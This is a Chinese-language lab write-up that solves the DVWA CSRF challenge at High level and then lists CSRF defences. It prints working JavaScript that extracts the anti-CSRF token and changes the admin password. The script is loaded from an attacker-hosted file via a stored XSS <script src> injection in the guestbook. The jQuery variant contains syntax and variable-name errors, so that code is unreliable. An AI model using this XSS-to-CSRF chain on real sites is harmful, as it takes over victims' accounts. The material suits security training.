一、High级过关
1、访问CSRF页面,在页面的源代码中可以看到生成的Token
2、过关的核心
过关方案的核心在于要发送请求给http://10.37.129.2/DVWA/vulnerabilities/csrf/页面,然后从响应中取得Token(通过正则表达式可以提取出来的),取得后再将Token和新密码一起发送给http://10.37.129.2/DVWA/vulnerabilities/?user_token=TOKEN&password_new=123456&password_conf=123456&Change=Change页面完成密码修改
3、构造JS代码
先构造一个javascript原生代码发送AJAX请求的代码:
var tokenUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/';
var count = 0;
//示例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
//当请求的状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function(){
//状态码:0:请求未初始化,1:服务器连接已成立,2:请求已接收,3:请求处理中,4:请求已完成,且响应已就绪
if(xmlhttp.readyState == 4 && xmlhttp.status == 200)
{
//取得请求的响应,并从响应中通过正则提取Token
var text = xmlhttp.responseText;
var regex = /user_token\' value\=\'(.*?)\' \/\>/;
var match = text.match(regex);
//alert(match[1]);
var token = match[1];
//发送修改密码的语法
var changeUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=123456&password_conf=123456&Change=Change';
if (count == 0){
count =1; //只发送一次,否则会多次发送
xmlhttp.open("GET",changeUrl,false); //false代表同步方式发送
xmlhttp.send();
}
}
};
xmlhttp.open("GET",tokenUrl,false);
xmlhttp.send();
将上述javascript代码放置于攻击服务器上,如:http://10.211.55.16/csrf.js
想办法将上述JS代码嵌入到被攻击服务者服务器上即可完成。(而这一步,在High级无法实现)
因为在High级,时屏蔽了<script>标签的,所以无法直接使用
所以我们的解决方法是:先切换到low级,在留言本里面注入以下脚本,然后再切换到High级,直接触发改密。
<script src="http://10.211.55.16/csrf.js?"+Math.random()></script>
我们发现Message那个地方,我们输入的东西的长度大于那个框所允许输入的长度
所以接下来我们先打开F12,将这个框的maxlength改为500
然后重新将我们的<script>代码输入进去,点击Sign Guestbook,发现保存成功
看一下数据库里进去没有,发现已经输入进去啦
然后我们点击切换到高级,就能完成改密啦
我们之前的密码是password,新密码是123456,让我们验证一下密码是否被修改
当我们输入admin,password的时候告诉我们密码不正确
当我们输入admin,123456的时候,告诉我们密码正确
可以使用Fidder完整监听整个过程,也可以使用浏览器F12调试模式进行处理。
思考:为什么此处要使用javascript原生代码来发送请求,使用JQuery不是更简单吗?
var script = document.createElement("script");
script.type="text/javascript";
script.src="http://10.211.55.16/jquery-3.4.1.min.js";
document.getElementsByTagName('head')[0].appendChild(script);
setTimeout(function)() {
$(document).ready(function(){
var tokenUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/';
$.get(tokenUrl,function(data){
var regex = /user_token\' value\=\'(.*?)\' \/\>/;
var match = data.match(regex);
var token = match[1];
var changeUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=123456&password_conf=123456&Change=Change';
$.get(changeurl,function(data){
alert('done');
});
});
});
},500);
二、CSRF防御
(1)避免在URL中明文显示特定操作的参数内容;
(2)使用同步令牌(Synchronizer Token),检查客户端请求是否包含令牌及其有效性;(常用的做法,并且保证每次Token的值完全随机且每次不同)
(3)检查Referer Header,拒绝来自非本网站的直接URL请求。
(4)不要在客户端保存敏感信息(比如身份认证信息);
(5)设置会话过期机制,比如20分钟无操作,直接登录超时退出;
(6)敏感信息的修改时需要对身份进行二次确认,比如修改账号时,需要判断旧密码;
(7)敏感信息的修改使用post而不是get
(8)避免交叉漏洞,如XSS等
(9)禁止跨域访问
(10)在响应中设置CSP (Content-Security-Police)内容安全策略